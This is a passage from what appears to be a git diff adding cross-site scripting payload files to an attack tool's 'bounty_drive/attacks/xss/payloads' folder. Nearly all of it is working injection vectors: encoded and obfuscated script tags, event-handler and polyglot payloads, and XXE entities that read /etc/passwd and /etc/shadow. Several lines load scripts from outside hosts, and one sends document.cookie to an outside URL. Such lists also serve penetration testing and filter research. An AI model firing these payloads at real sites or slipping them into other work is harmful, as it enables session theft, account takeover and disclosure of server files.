DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> +<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> +<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> +<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- +<a href="javascript#document.vulnerable=true;"> +<div onmouseover="document.vulnerable=true;"> +<img src="javascript:document.vulnerable=true;"> +<img dynsrc="javascript:document.vulnerable=true;"> +<input type="image" dynsrc="javascript:document.vulnerable=true;"> +<bgsound src="javascript:document.vulnerable=true;"> +&<script>document.vulnerable=true;</script> +&{document.vulnerable=true;}; +<img src=&{document.vulnerable=true;};> +<link rel="stylesheet" href="javascript:document.vulnerable=true;"> +<iframe src="vbscript:document.vulnerable=true;"> +<img src="mocha:document.vulnerable=true;"> +<img src="livescript:document.vulnerable=true;"> +<a href="about:<script>document.vulnerable=true;</script>"> +<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> +<body onload="document.vulnerable=true;"> +<div style="background-image: url(javascript:document.vulnerable=true;);"> +<div style="behaviour: url([link to code]);"> +<div style="binding: url([link to code]);"> +<div style="width: expression(document.vulnerable=true;);"> +<style type="text/javascript">document.vulnerable=true;</style> +<object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> +<style><!--</style><script>document.vulnerable=true;//--></script> +<<script>document.vulnerable=true;</script> +<![<!--]]<script>document.vulnerable=true;//--></script> +<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> +<img src="blah"onmouseover="document.vulnerable=true;"> +<img src="blah>" onmouseover="document.vulnerable=true;"> +<xml src="javascript:document.vulnerable=true;"> +<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> +<div datafld="b" dataformatas="html" datasrc="#X"></div> +[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> +<style>@import'http://www.securitycompass.com/xss.css';</style> +<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> +<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> +<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> +<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> +<script SRC="http://www.securitycompass.com/xss.jpg"></script> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> +<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> +<script =">" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> +<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> +<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> +<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] +";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; +<;/script>;<;script>;alert(1)<;/script>; +<;/br style=a:expression(alert())>; +<;scrscriptipt>;alert(1)<;/scrscriptipt>; +<;br size=\";&;{alert(&#039;XSS&#039;)}\";>; +perl -e &#039;print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;&#039; >; out +perl -e &#039;print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;&#039; >; out +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS STYLE=xss:expression(alert('XSS'))> +"><script>alert('XSS')</script> +</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS STYLE=xss:e/**/xpression(alert('XSS'))> +</XSS STYLE=xss:expression(alert('XSS'))> +>"><script>alert("XSS")</script>& +"><STYLE>@import"javascript:alert('XSS')";</STYLE> +>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> +>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> +'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' +'';!--"<XSS>=&{()} +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)> +<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41> +<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041> +<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"> +<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"> +<![CDATA[<script>var n=0;while(true){n++;}</script>]]> +<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> +<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> +<script>alert('XSS')</script> +%3cscript%3ealert('XSS')%3c/script%3e +%22%3e%3cscript%3ealert('XSS')%3c/script%3e +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=javascript:alert('XSS')> +<img src=xss onerror=alert(1)> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<BODY BACKGROUND="javascript:alert('XSS')"> +<BODY ONLOAD=alert('XSS')> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +<<SCRIPT>alert("XSS");//<</SCRIPT> +%253cscript%253ealert(1)%253c/script%253e +"><s"%2b"cript>alert(document.cookie)</script> +foo<script>alert(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt> +<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<marquee onstart='javascript:alert('1');'>=(◕_◕)= \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-Polyglot-Ultimate-0xsobky.txt b/bounty_drive/attacks/xss/payloads/XSS-Polyglot-Ultimate-0xsobky.txt new file mode 100644 index 0000000..907cb73 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-Polyglot-Ultimate-0xsobky.txt @@ -0,0 +1 @@ +jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e diff --git a/bounty_drive/attacks/xss/payloads/XSS-Polyglots-Dmiessler.txt b/bounty_drive/attacks/xss/payloads/XSS-Polyglots-Dmiessler.txt new file mode 100644 index 0000000..1c0378e --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-Polyglots-Dmiessler.txt @@ -0,0 +1,11 @@ +javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* +javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a +javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ +javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* +javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* +javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// +javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* +--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* +/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* +javascript://--></title></style></textarea></script><svg "//' onclick=alert()// +/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* diff --git a/bounty_drive/attacks/xss/payloads/XSS-Polyglots.txt b/bounty_drive/attacks/xss/payloads/XSS-Polyglots.txt new file mode 100644 index 0000000..21d6f97 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-Polyglots.txt @@ -0,0 +1,14 @@ +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// +'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> +javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* +javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a +javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ +javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* +javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* +javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// +javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* +--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* +/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* +javascript://--></title></style></textarea></script><svg "//' onclick=alert()// +/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* diff --git a/bounty_drive/attacks/xss/payloads/XSS-RSNAKE.txt b/bounty_drive/attacks/xss/payloads/XSS-RSNAKE.txt new file mode 100644 index 0000000..745e370 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-RSNAKE.txt @@ -0,0 +1,73 @@ +<SCRIPT>alert('XSS');</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> +<IMG SRC="javascript:alert('XSS')" +<SCRIPT>a=/XSS/ +\";alert('XSS');// +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<BODY ONLOAD=alert('XSS')> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="mocha:[code]"> +<IMG SRC="livescript:[code]"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<XSS STYLE='no\xss:noxss("*//*"); +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<BASE HREF="javascript:alert('XSS');//"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> +getURL("javascript:alert('XSS')") +a="get"; +<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');"> +<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> +<HTML><BODY> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)'; +<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-Somdev.txt b/bounty_drive/attacks/xss/payloads/XSS-Somdev.txt new file mode 100644 index 0000000..ca096b4 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-Somdev.txt @@ -0,0 +1,22 @@ +<svg%0Aonload=%09((pro\u006dpt))()// +<sCriPt x>(((confirm)))``</scRipt x> +<w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z +<deTAiLs/open/oNtoGGle=confirm()> +<scRiPt y="><">/*<sCRipt* */prompt()</script +<A href="javascript%26colon;confirm()">click +<sVg oNloaD=write()> +<A href=javas%26#99;ript:alert(1)>click +<sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)> +<svG/x=">"/oNloaD=confirm()// +<--`<iMG/srC=` onerror=confirm``> --!> +<SVg </onlOad ="1> (_=prompt,_(1)) ""> +<!--><scRipT src=//14.rs> +<sCriPt/src=//14.rs? +<sCRIpt x=">" src=//15.rs></script> +<D3/OnMouSEenTer=[2].find(confirm)>z +<D3"<"/OncLick="1>[confirm``]"<">z +<D3/OnpOinTeReENter=confirm``>click here +<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> +<Z oncut=alert()>x +<iFrAMe/src \/\/onload = prompt(1) +<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-Vectors-Mario.txt b/bounty_drive/attacks/xss/payloads/XSS-Vectors-Mario.txt new file mode 100644 index 0000000..189082e --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-Vectors-Mario.txt @@ -0,0 +1,137 @@ +<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk')) +<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script> +<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script> +<input onfocus=alert(7) autofocus> +<input onblur=alert(8) autofocus><input autofocus> +<a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a> +<video poster=javascript:alert(10)//></video> +<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg> +<body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x> +<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!> +<script>({0:#0=alert/#0#/#0#(0)})</script> +X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` > +<?xml-stylesheet href="javascript:alert(17)"?><root/> +<script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script> +<meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾ +<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script> +<input onblur=focus() autofocus><input> +<form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button> +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`> +<script src="#">{alert(25)}</script>;1 ++ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input); +<style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;> +<link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d +<style>@import "data:,*%7bx:expression(alert(30))%7D";</style> +<frameset onload=alert(31)> +<table background="javascript:alert(32)"></table> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a> +1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a> +<!--<img src="--><img src=x onerror=alert(37)//"> +<comment><img src="</comment><img src=x onerror=alert(38)//"> +<![><img src="]><img src=x onerror=alert(39)//"><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg> +<style><img src="</style><img src=x onerror=alert(40)//"> +<li style=list-style:url() onerror=alert(41)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div> +<head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body> +<?xml version="1.0" standalone="no"?><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head><body>Hello</body></html> +<style>*[{}@import'test.css?]{color: green;}</style>X +<div style="font-family:'foo[a];color:red;';">XXX</div> +<div style="font-family:foo}color=red;">XXX</div> +<svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg> +<SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT> +<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> +<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed> +<x style="behavior:url(test.sct)"> +<xml id="xss" src="test.htc"></xml><label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script> +<video><source onerror="alert(55)"> +<video onerror="alert(56)"><source></source></video> +<b <script>alert(57)//</script>0</script></b> +<b><script<b></b><alert(58)</script </b></b> +<div id="div1"><input value="``onmouseover=alert(59)"></div><div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<div style="[a]color[b]:[c]red">XXX</div> +<div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div> +<x '="foo"><x foo='><img src=x onerror=alert(62)//'><!-- IE 6-9 --><! '="foo"><x foo='><img src=x onerror=alert(2)//'><? '="foo"><x foo='><img src=x onerror=alert(3)//'> +<embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF<img src="javascript:alert(2)"><image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓ +<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y> +<svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg> +<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?><root/> +<!DOCTYPE x [<!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(67)" onload CDATA "alert(2)">]><img /> +<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"><html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x></doc> +<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card> +<div style=width:1px;filter:glow onfilterchange=alert(70)>x</div> +<// style=x:expression\28alert(71)\29> +<form><button formaction="javascript:alert(72)">X</button> +<event-source src="event.php" onload="alert(73)"> +<a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a> +<script<{alert(75)}/></script </> +<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x> +<?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/> +<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/> +<object allowscriptaccess="always" data="test.swf"></object> +<style>*{x:expression(alert(80))}</style> +<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/> +<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?> +<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template> +<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/> +<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/> +<body oninput=alert(86)><input autofocus> +<svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a></svg> +<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><animation xlink:href="javascript:alert(88)"/><animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/><image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/><foreignObject xlink:href="javascript:alert(88)"/><foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/></svg> +<svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onmouseover" to="alert(89)"/><animate attributeName="onunload" to="alert(89)"/></svg> +<div style=content:url(test2.svg)></div><div style="background:url(test5.svg)">PRESS ENTER</div> +<? foo="><script>alert(91)</script>"><! foo="><script>alert(91)</script>"></ foo="><script>alert(91)</script>"><? foo="><x foo='?><script>alert(91)</script>'>"><! foo="[[[x]]"><x foo="]foo><script>alert(91)</script>"><% foo><x foo="%><script>alert(91)</script>"> +<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div> +<div 